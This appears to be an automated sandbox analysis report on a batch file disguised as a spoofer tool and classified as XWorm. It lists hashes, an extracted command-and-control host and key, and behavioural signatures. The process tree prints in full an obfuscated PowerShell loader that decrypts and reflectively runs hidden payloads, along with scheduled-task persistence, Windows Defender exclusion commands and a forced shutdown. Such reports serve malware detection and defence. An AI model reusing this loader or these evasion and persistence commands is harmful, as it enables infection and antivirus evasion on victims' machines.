Analysis
-
max time kernel
44s -
max time network
46s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24-01-2025 14:50
Static task
static1
Errors
General
-
Target
EzSpoofer.bat
-
Size
262KB
-
MD5
1298934b3f4c37d349794f0686c6e7a8
-
SHA1
9a6848b79ba8aba796514526898b4c9217301bc0
-
SHA256
2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0
-
SHA512
ee7afbdd2cc0297cd0da983618fa45e7c0304c142723f394a8a3d484d6f87e36a902f6dc4788007cd8df5252a455d697eeb21eb1673f41f9464a3d1872179374
-
SSDEEP
6144:lyFq/jSEnae2y5lSdU0NeUmerUzCO6jZFwkjAZ9:lyFqbSOaeUxeCOibw+AZ9
Malware Config
Extracted
xworm
IDKTOBEHONESTNIGAS-56344.portmap.io:56344
RRwG35fodUbwRp96
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/912-56-0x000002C11A6C0000-0x000002C11A6D0000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 23 IoCs
flow pid Process 16 912 powershell.exe 25 912 powershell.exe 26 912 powershell.exe 28 912 powershell.exe 29 912 powershell.exe 30 912 powershell.exe 32 912 powershell.exe 34 912 powershell.exe 35 912 powershell.exe 36 912 powershell.exe 37 912 powershell.exe 38 912 powershell.exe 39 912 powershell.exe 46 912 powershell.exe 47 912 powershell.exe 52 912 powershell.exe 53 912 powershell.exe 54 912 powershell.exe 55 912 powershell.exe 56 912 powershell.exe 57 912 powershell.exe 58 912 powershell.exe 59 912 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1968 powershell.exe 2332 powershell.exe 1896 powershell.exe 4596 powershell.exe 912 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4069049685-955655941-4058287599-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "147" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4069049685-955655941-4058287599-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1896 powershell.exe 1896 powershell.exe 4596 powershell.exe 4596 powershell.exe 912 powershell.exe 912 powershell.exe 1968 powershell.exe 1968 powershell.exe 2332 powershell.exe 2332 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1896 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe Token: 33 4596 powershell.exe Token: 34 4596 powershell.exe Token: 35 4596 powershell.exe Token: 36 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe Token: 33 4596 powershell.exe Token: 34 4596 powershell.exe Token: 35 4596 powershell.exe Token: 36 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe Token: 33 4596 powershell.exe Token: 34 4596 powershell.exe Token: 35 4596 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4764 LogonUI.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 4044 wrote to memory of 1896 4044 cmd.exe 83 PID 4044 wrote to memory of 1896 4044 cmd.exe 83 PID 1896 wrote to memory of 4596 1896 powershell.exe 86 PID 1896 wrote to memory of 4596 1896 powershell.exe 86 PID 1896 wrote to memory of 4756 1896 powershell.exe 90 PID 1896 wrote to memory of 4756 1896 powershell.exe 90 PID 4756 wrote to memory of 3444 4756 WScript.exe 92 PID 4756 wrote to memory of 3444 4756 WScript.exe 92 PID 3444 wrote to memory of 912 3444 cmd.exe 94 PID 3444 wrote to memory of 912 3444 cmd.exe 94 PID 912 wrote to memory of 1968 912 powershell.exe 96 PID 912 wrote to memory of 1968 912 powershell.exe 96 PID 912 wrote to memory of 2332 912 powershell.exe 100 PID 912 wrote to memory of 2332 912 powershell.exe 100 PID 912 wrote to memory of 4456 912 powershell.exe 103 PID 912 wrote to memory of 4456 912 powershell.exe 103
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_521_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_521.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_521.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_521.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_521.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_521.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2332
-
-
C:\Windows\SYSTEM32\shutdown.exeshutdown.exe /f /s /t 06⤵PID:4456
-
-
-
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3a1d855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4764
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD52e4e6cd714d0a6b24d21df4b15a8efef
SHA1ea175071d140c16f803d5b372a1282e0297d18dc
SHA25668b99a29dded5e875531cbaf532938c5b4663046cb45f0b079e36a1f6ec45644
SHA51244b84a22db9d5c7b6e180643bab446ea7a3705f38321b96ddf6a2de663969984423656aab8c58d55428144c74f5a6c84227ac41d2559ab7fa6e35b8e03d1b25a
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
115B
MD58cf88d10c55164a3cf381f6475513a5d
SHA1921096caeaf9b1b5a85a6e00b6ca4f9003470689
SHA256c1c3dba8139e12a1d0d7868186c426ca35c9b72c0f94da2bd43a410c96ce18ce
SHA51290c0f2936edf1228de0f9f912ff0790f60550770557385dc30bbd4f958a90a420e9921e07af50dbfb298b1fcd4dccc4881915371b29e8f9d1070e20dd6e9f039